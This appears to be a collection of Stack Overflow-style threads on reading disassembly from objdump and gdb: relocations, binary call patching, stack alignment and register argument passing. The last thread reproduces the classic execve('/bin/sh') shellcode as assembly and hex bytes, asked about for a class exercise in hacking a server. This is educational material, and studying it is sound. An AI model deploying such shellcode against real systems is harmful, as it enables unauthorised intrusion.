I'm trying to change C code to assembly code.
At first, i used gcc and objdump function to extract assembly code from c code.
The C code was just simple printf code.
#include <stdio.h>
int main(){
printf("this\n");
return 0;
}
gcc -c -S -O0 test.c
objdump -dS test.o > test.txt
0000000000000000 <main>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: bf 00 00 00 00 mov $0x0,%edi
9: e8 00 00 00 00 callq e <main+0xe>
e: b8 00 00 00 00 mov $0x0,%eax
13: 5d pop %rbp
14: c3 retq
in this assembly code,
i was curious why callq instructions destination is e
so i run this code in gdb using
disas main
(gdb) disas main
Dump of assembler code for function main:
0x0000000000400526 <+0>: push %rbp
0x0000000000400527 <+1>: mov %rsp,%rbp
0x000000000040052a <+4>: mov $0x4005c4,%edi
0x000000000040052f <+9>: callq 0x400400 <puts#plt>
0x0000000000400534 <+14>: mov $0x0,%eax
0x0000000000400539 <+19>: pop %rbp
0x000000000040053a <+20>: retq
in this code, i assumed that 0x400400 is the address of printf function.
Why does objdump and gdb's assembly code show different result?
How can i make objdump result shows the right callq destination?
When you run the objdump command you are not disassembling the final executable, you are disassembling the object file produced by the compiler (test.o). I performed similar steps (using your code) to you (compiling and running objdump and dissas in GDB) except I performed the objdump on the linked executable not on the object file (this means I did not compile with the -c flag). The outputs are below:
objdump -dS a.out:
1140: 55 push %rbp
1141: 48 89 e5 mov %rsp,%rbp
1144: 48 83 ec 10 sub $0x10,%rsp
1148: 48 8d 3d b5 0e 00 00 lea 0xeb5(%rip),%rdi # 2004 <_IO_stdin_used+0x4>
114f: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
1156: b0 00 mov $0x0,%al
1158: e8 d3 fe ff ff callq 1030 <printf#plt>
115d: 31 c9 xor %ecx,%ecx
115f: 89 45 f8 mov %eax,-0x8(%rbp)
1162: 89 c8 mov %ecx,%eax
1164: 48 83 c4 10 add $0x10,%rsp
1168: 5d pop %rbp
1169: c3 retq
116a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1)
GDB:
(gdb) disas main
Dump of assembler code for function main:
0x0000000000001140 <+0>: push %rbp
0x0000000000001141 <+1>: mov %rsp,%rbp
0x0000000000001144 <+4>: sub $0x10,%rsp
0x0000000000001148 <+8>: lea 0xeb5(%rip),%rdi # 0x2004
0x000000000000114f <+15>: movl $0x0,-0x4(%rbp)
0x0000000000001156 <+22>: mov $0x0,%al
0x0000000000001158 <+24>: callq 0x1030 <printf#plt>
0x000000000000115d <+29>: xor %ecx,%ecx
0x000000000000115f <+31>: mov %eax,-0x8(%rbp)
0x0000000000001162 <+34>: mov %ecx,%eax
0x0000000000001164 <+36>: add $0x10,%rsp
0x0000000000001168 <+40>: pop %rbp
0x0000000000001169 <+41>: retq
End of assembler dump.
As you can see, the two disassemblies are the same, except for some minor syntax differences (e.g. GDB prefixes it's addresses with 0x).
What you're missing with objdump by default is relocations.
Running objdump with the -r flag lets you see these. e.g.
objdump -Sr foo.o
foo.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <main>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: bf 00 00 00 00 mov $0x0,%edi
5: R_X86_64_32 .rodata
9: e8 00 00 00 00 callq e <main+0xe>
a: R_X86_64_PC32 puts-0x4
e: b8 00 00 00 00 mov $0x0,%eax
13: 5d pop %rbp
14: c3 retq
Shows us that the call will use a PC relative address, pointing to puts
Related
I wonder how to switch the call to a function for another inside an executable (.exe in my case)
Here is the code I try to play with
#include <stdio.h>
void hello()
{
printf("Hello world!");
}
void investigate()
{
printf("Investigate all the things!");
}
main()
{
hello();
}
Once I compiled the above code (with gcc) and got an executable (.exe) out of it, I want to switch the "hello" call with "investigate".
--Edit--
My environment: Windows 10 (64bit), mingw with gcc/g++ 4.8.1
--Edit 2--
I'm fine with Linux answer (any Ubuntu or any OpenSuse and any architecture) too as for me it's very important to have a proof-of-concept.
Assuming the compiler is not omitting dead functions entirely, that it is not inlining the function and that the call won't go through the PLT, once you have compiled the executable, you can simply edit the call instruction.
Note that the two functions must be "compatible", where the notion of compatibility is fuzzy, it means "the new must satisfy at least the same assumptions the compiler made when calling the old one".
The ABI is of course one such assumption but it may not be the only one.
If your compiler omitted dead function, you can't switch the function (one is missing).
If your compiler inlined the call, you can't switch the function (there is no call). You can work against the compiler and rewrite the code at the call-site (in the C source), this is called patching.
If your compiler used the PLT, you need to change the GOT entry used by the PLT stub. You may need to document your self a bit but changing the linked procedure is actually a feature of PLT machinery.
If your compiler did nothing of that, this should be case for such a simple source when no optimisations are enabled, you can use objdump -d <file> to find the call-site and the address of the new function:
000000000040051d <hello>:
40051d: 55 push %rbp
40051e: 48 89 e5 mov %rsp,%rbp
400521: bf f0 05 40 00 mov $0x4005f0,%edi
400526: b8 00 00 00 00 mov $0x0,%eax
40052b: e8 d0 fe ff ff callq 400400 <printf#plt>
400530: 5d pop %rbp
400531: c3 retq
0000000000400532 <investigate>:
400532: 55 push %rbp
400533: 48 89 e5 mov %rsp,%rbp
400536: bf fd 05 40 00 mov $0x4005fd,%edi
40053b: b8 00 00 00 00 mov $0x0,%eax
400540: e8 bb fe ff ff callq 400400 <printf#plt>
400545: 5d pop %rbp
400546: c3 retq
0000000000400547 <main>:
400547: 55 push %rbp
400548: 48 89 e5 mov %rsp,%rbp
40054b: b8 00 00 00 00 mov $0x0,%eax
400550: e8 c8 ff ff ff callq 40051d <hello>
400555: b8 00 00 00 00 mov $0x0,%eax
40055a: 5d pop %rbp
40055b: c3 retq
40055c: 0f 1f 40 00 nopl 0x0(%rax)
Then change the immediate value of the call instruction with the difference between the target address and the address after the end of the call instruction (it doesn't matter where the origin is as long as it's the same for both addresses).
Target = 400532
After the end of call = 400555
Difference = 400532 - 400555 = -23 = 0xFFFFFFDD
Change from:
400550: e8 c8 ff ff ff
to:
400550: e8 dd ff ff ff
Note that immediates are little-endiands.
You can use an hexeditor to edit the code, to find the offset into the file you can either use an elf reader and do a bit of math your self or you can simply search for the bytes of the call instruction (check also the bytes around the call to be sure).
After the edit, the binary has been patched:
0000000000400532 <investigate>:
400532: 55 push %rbp
400533: 48 89 e5 mov %rsp,%rbp
400536: bf fd 05 40 00 mov $0x4005fd,%edi
40053b: b8 00 00 00 00 mov $0x0,%eax
400540: e8 bb fe ff ff callq 400400 <printf#plt>
400545: 5d pop %rbp
400546: c3 retq
0000000000400547 <main>:
400547: 55 push %rbp
400548: 48 89 e5 mov %rsp,%rbp
40054b: b8 00 00 00 00 mov $0x0,%eax
400550: e8 dd ff ff ff callq 400532 <investigate>
400555: b8 00 00 00 00 mov $0x0,%eax
40055a: 5d pop %rbp
40055b: c3 retq
Here is my code
#include <stdio.h>
char func_with_ret()
{
return 1;
}
void func_1()
{
char buf[16];
func_with_ret();
}
void func_2()
{
char buf[16];
getchar();
}
int main()
{
func_1();
func_2();
}
I declare 16-byte local buffers to keep the stack pointer aligned(for x86).
I write two function "func_1", "func_2", they look almost the same - allocate 16-byte local buffer and call a function with char return value and no parameter, but one is self-defined and the other is getchar().
Compile with gcc parameter "-fno-stack-protector"(so there's no canary on stack) and "-O0" to avoid unexpected optimization behavior.
Here is the disassembly code by gdb for func_1 and func_2.
Dump of assembler code for function func_1:
0x08048427 <+0>: push ebp
0x08048428 <+1>: mov ebp,esp
0x0804842a <+3>: sub esp,0x10
0x0804842d <+6>: call 0x804841d <func_with_ret>
0x08048432 <+11>: leave
0x08048433 <+12>: ret
Dump of assembler code for function func_2:
0x08048434 <+0>: push ebp
0x08048435 <+1>: mov ebp,esp
0x08048437 <+3>: sub esp,0x18
0x0804843a <+6>: call 0x80482f0 <getchar#plt>
0x0804843f <+11>: leave
0x08048440 <+12>: ret
In func_1, buffer is allocated for 0x10(16) bytes,
but in func_2 , it is allocated for 0x18(24) bytes, why?
Edit:
#Attie figure out that buffer size is actually the same for both, but there's
strange 8-byte stack spaces in func_2 don't know where it comes from.
I have just tried to reproduce this, see below:
Compiling for x86-64 (no joy):
$ gcc p.c -g -o p -O0 -fno-stack-protector
$ objdump -d p
p: file format elf64-x86-64
[...]
0000000000400538 <func_1>:
400538: 55 push %rbp
400539: 48 89 e5 mov %rsp,%rbp
40053c: 48 83 ec 10 sub $0x10,%rsp
400540: b8 00 00 00 00 mov $0x0,%eax
400545: e8 e3 ff ff ff callq 40052d <func_with_ret>
40054a: c9 leaveq
40054b: c3 retq
000000000040054c <func_2>:
40054c: 55 push %rbp
40054d: 48 89 e5 mov %rsp,%rbp
400550: 48 83 ec 10 sub $0x10,%rsp
400554: e8 c7 fe ff ff callq 400420 <getchar#plt>
400559: c9 leaveq
40055a: c3 retq
Compiling for i386 (success):
$ gcc p.c -g -o p -O0 -fno-stack-protector -m32
$ objdump -d p
p: file format elf32-i386
[...]
08048427 <func_1>:
8048427: 55 push %ebp
8048428: 89 e5 mov %esp,%ebp
804842a: 83 ec 10 sub $0x10,%esp
804842d: e8 eb ff ff ff call 804841d <func_with_ret>
8048432: c9 leave
8048433: c3 ret
08048434 <func_2>:
8048434: 55 push %ebp
8048435: 89 e5 mov %esp,%ebp
8048437: 83 ec 18 sub $0x18,%esp
804843a: e8 b1 fe ff ff call 80482f0 <getchar#plt>
804843f: c9 leave
8048440: c3 ret
This doesn't appear to be related to any of the following:
The fact that getchar() is a library function, and thus we are calling into the PLT (Procedure Linkage Table).
Related to the return type of the function
The order of the calls in main()
The order of the functions in the binary
Dynamic / static compliation
If you however increase the size of your buffer by one, to 17, then the stack usage increases to 32 and 40 bytes (from 16 and 24 bytes) respectively. The difference is 16 bytes, which is used for alignment, as answered here.
I can't answer why the stack alignment appears to be off by 8-bytes upon entering func_2() though.
If you update func_1() and func_2() to have a 15-byte buffer, and a single byte variable, and write data to them, then you can see where these items are in the stack frame:
void func_1(void) {
char buf[15];
char x;
buf[0] = 0xaa;
x = 0x55;
func_with_ret();
}
void func_2(void) {
char buf[15];
char x;
buf[0] = 0xaa;
x = 0x55;
getchar();
}
08048434 <func_1>:
8048434: 55 push %ebp
8048435: 89 e5 mov %esp,%ebp
8048437: 83 ec 10 sub $0x10,%esp
804843a: c6 45 f0 aa movb $0xaa,-0x10(%ebp)
804843e: c6 45 ff 55 movb $0x55,-0x1(%ebp)
8048442: e8 d6 ff ff ff call 804841d <func_with_ret>
8048447: c9 leave
8048448: c3 ret
08048449 <func_2>:
8048449: 55 push %ebp
804844a: 89 e5 mov %esp,%ebp
804844c: 83 ec 18 sub $0x18,%esp
804844f: c6 45 e8 aa movb $0xaa,-0x18(%ebp)
8048453: c6 45 f7 55 movb $0x55,-0x9(%ebp)
8048457: e8 94 fe ff ff call 80482f0 <getchar#plt>
804845c: c9 leave
804845d: c3 ret
#include <stdio.h>
void DispString(const char* charList)
{
puts(charList);
}
void main()
{
DispString("Hello, world!");
}
compile: gcc -c -g test.c -o test.o
link: gcc -o test test.o
Very simple, but when I use objdump to disassemble the object file(test.o), I got the following result:
objdump -d test.o:
boot.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <DispString>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: 48 83 ec 10 sub $0x10,%rsp
8: 48 89 7d f8 mov %rdi,-0x8(%rbp)
c: 48 8b 45 f8 mov -0x8(%rbp),%rax
10: 48 89 c7 mov %rax,%rdi
13: e8 00 00 00 00 callq 18 <DispString+0x18>
18: c9 leaveq
19: c3 retq
000000000000001a <main>:
1a: 55 push %rbp
1b: 48 89 e5 mov %rsp,%rbp
1e: bf 00 00 00 00 mov $0x0,%edi
23: e8 00 00 00 00 callq 28 <main+0xe>
28: 5d pop %rbp
29: c3 retq
For the line 23, it passed 0 to %edi register, which is definitely wrong. It should pass the address of the "Hello, world!" string to it. And it called 28 <main+0xe>? The line 28 is just its next line, rather than function DispString(which is in line 0). Why could this happen? I've also looked into the final test file, in which all the values are just correct. So how could the linker know where to find those functions or strings?
You are only translating file so no linking has been done. Once linking jas been done, then and then DispString()'s address will be known to main and it will jump to there. So as suggested in one of the comments, use objdump with the comliled executable.
I have this test.c on my Ubuntu14.04 x86_64 system.
void foo(int a, long b, int c) {
}
int main() {
foo(0x1, 0x2, 0x3);
}
I compiled this with gcc --no-stack-protector -g test.c -o test and got the assembly code with objdump -dS test -j .text
00000000004004ed <_Z3fooili>:
void foo(int a, long b, int c) {
4004ed: 55 push %rbp
4004ee: 48 89 e5 mov %rsp,%rbp
4004f1: 89 7d fc mov %edi,-0x4(%rbp)
4004f4: 48 89 75 f0 mov %rsi,-0x10(%rbp)
4004f8: 89 55 f8 mov %edx,-0x8(%rbp) // !!Attention here!!
}
4004fb: 5d pop %rbp
4004fc: c3 retq
00000000004004fd <main>:
int main() {
4004fd: 55 push %rbp
4004fe: 48 89 e5 mov %rsp,%rbp
foo(0x1, 0x2, 0x3);
400501: ba 03 00 00 00 mov $0x3,%edx
400506: be 02 00 00 00 mov $0x2,%esi
40050b: bf 01 00 00 00 mov $0x1,%edi
400510: e8 d8 ff ff ff callq 4004ed <_Z3fooili>
}
400515: b8 00 00 00 00 mov $0x0,%eax
40051a: 5d pop %rbp
40051b: c3 retq
40051c: 0f 1f 40 00 nopl 0x0(%rax)
I know that the function parameters should be pushed to stack from right to left in sequence. So I was expecting this
void foo(int a, long b, int c) {
push %rbp
mov %rsp,%rbp
mov %edi,-0x4(%rbp)
mov %rsi,-0x10(%rbp)
mov %edx,-0x14(%rbp) // c should be push on stack after b, not after a
But gcc seemed clever enough to push parameter c(0x3) right after a(0x1) to save the four bytes which should be reserved for data alignment of b(0x2). Can someone please explain this and show me some documentation on why gcc did this?
The parameters are passed in registers - edi, esi, edx (then rcx, r8, r9 and only then pushed on stack) - just what the Linux amd64 calling convention mandates.
What you see in your function is just how the compiler saves them upon entry when compiling with -O0, so they're in memory where a debugger can modify them. It is free to do it in any way it wants, and it cleverly does this space optimization.
The only reason it does this is that gcc -O0 always spills/reloads all C variables between C statements to support modifying variables and jumping between lines in a function with a debugger.
All this would be optimized out in release build in the end.
I know how to get the assembly code of my program using gdb but how do I get the opcode?
I need it to hack a linux server (don't worry it's part of a class I'm having so no real server will be harmed). Actually I was reading this article and I'm wondering how can I get from assembly:
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>: pushl %ebp
0x8000131 <main+1>: movl %esp,%ebp
0x8000133 <main+3>: jmp 0x800015f <main+47>
0x8000135 <main+5>: popl %esi
0x8000136 <main+6>: movl %esi,0x8(%esi)
0x8000139 <main+9>: movb $0x0,0x7(%esi)
0x800013d <main+13>: movl $0x0,0xc(%esi)
0x8000144 <main+20>: movl $0xb,%eax
0x8000149 <main+25>: movl %esi,%ebx
0x800014b <main+27>: leal 0x8(%esi),%ecx
0x800014e <main+30>: leal 0xc(%esi),%edx
0x8000151 <main+33>: int $0x80
0x8000153 <main+35>: movl $0x1,%eax
0x8000158 <main+40>: movl $0x0,%ebx
0x800015d <main+45>: int $0x80
0x800015f <main+47>: call 0x8000135 <main+5>
0x8000164 <main+52>: das
0x8000165 <main+53>: boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>: das
0x8000169 <main+57>: jae 0x80001d3 <__new_exitfn+55>
0x800016b <main+59>: addb %cl,0x55c35dec(%ecx)
End of assembler dump.
the following:
testsc.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
The system is linux x86 and the language I will be using C. I'd really like an automated way, but a manual solution would work too.
I mean how do I convert %ebp, %esi, %esp etc.. Is there a map I can use? or an automated programm?
Here you go:
Disassembly of section .data:
00000000 <shellcode>:
0: eb 2a jmp 2c <shellcode+0x2c>
2: 5e pop %esi
3: 89 76 08 mov %esi,0x8(%esi)
6: c6 46 07 00 movb $0x0,0x7(%esi)
a: c7 46 0c 00 00 00 00 movl $0x0,0xc(%esi)
11: b8 0b 00 00 00 mov $0xb,%eax
16: 89 f3 mov %esi,%ebx
18: 8d 4e 08 lea 0x8(%esi),%ecx
1b: 8d 56 0c lea 0xc(%esi),%edx
1e: cd 80 int $0x80
20: b8 01 00 00 00 mov $0x1,%eax
25: bb 00 00 00 00 mov $0x0,%ebx
2a: cd 80 int $0x80
2c: e8 d1 ff ff ff call 2 <shellcode+0x2>
31: 2f das
32: 62 69 6e bound %ebp,0x6e(%ecx)
35: 2f das
36: 73 68 jae a0 <shellcode+0xa0>
38: 00 89 ec 5d c3 00 add %cl,0xc35dec(%ecx)
Note how the last 00 in that add %cl instruction comes from the string null terminator byte; it is not explicit.
How I got this was that I simply compiled your declaration with
gcc testsc.c -c
and then
objdump -D testsc.o
You can use:
gcc -S -c tst.c -o -
or
gcc -g -ggdb -c tst.c
objdump -S tst.o
to get the disassembly of your program with the opcodes.
To get the disassembly of your char array, you can use:
gcc -c tst.c
objdump -D -j .data tst.o
Found it! First disassemble then type :
x/bx hit enter and get one by one the hex representation of the assembly commands!
Create a small assembly file, say code.s. Then put the following inside:
.text
.byte 0xeb, 0x2a, 0x5e, ..
Assemble it with as code.s -o code.o and use objdump to disassemble the result.